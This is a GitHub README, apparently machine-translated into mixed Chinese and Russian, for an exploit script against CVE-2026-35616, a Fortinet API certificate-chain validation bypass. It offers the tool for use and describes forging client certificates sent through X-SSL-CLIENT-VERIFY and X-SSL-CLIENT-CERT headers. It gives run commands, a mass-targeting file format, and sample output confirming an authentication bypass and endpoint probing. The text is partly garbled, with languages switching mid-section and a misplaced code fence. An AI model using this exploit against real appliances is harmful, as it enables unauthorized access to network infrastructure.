wa6n3r/CVE-2026-35616
GitHub: wa6n3r/CVE-2026-35616
针对 Fortinet API 证书链校验漏洞的自动化利用脚本,伪造客户端证书以绕过信任验证。
Stars: 1 | Forks: 2
# CVE-2026-35616
## 描述
利用 Fortinet API 中的证书链验证绕过漏洞。
该脚本会自动从各种来源发现有效的 Common Name (CN),
生成伪造的客户端证书,并使用 `X-SSL-CLIENT-VERIFY` 和 `X-SSL-CLIENT-CERT` 头部向受保护的 endpoint 发送请求。
## 环境要求
- Python 3.8+
- 依赖项:
- `requests`
- `cryptography`
- `urllib3`
- 可选:`openssl`(用于通过 TLS handshake 进行高级 CA 发现)
## 安装
```
# 克隆项目
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# 安装依赖
pip install -r requirements.txt
## 使用
# 基本运行
python3 exploit.py
# 指定目标和端口
python3 exploit.py [PORT]
# 示例:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# 目标文件格式 (targets.txt)
При массовом тестировании создайте файл targets.txt с одним целевым адресом на строку:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# 输出文件
При успешном выполнении скрипт создаёт:
results/bypass_results___.json — детальный отчёт в формате JSON с:
Использованным CN
Статусами ответов по каждому эндпоинту
Префиксами ответов для анализа
# 输出结构
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 Target: https://192.168.1.100:443
[*] Discovering CA CNs from multiple sources...
[•] TLS CA CN: 'fortinet-ca2'
[•] ZTNA CA CN: 'support'
[*] Found 2 candidate CN(s): fortinet-ca2, support
[*] Testing 2 candidate CN(s) for bypass...
[+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED
[*] Probing all cert_chain endpoints with CN='support'...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json
```
标签:Python, StruQ, 无后门, 渗透测试, 漏洞利用, 绕过验证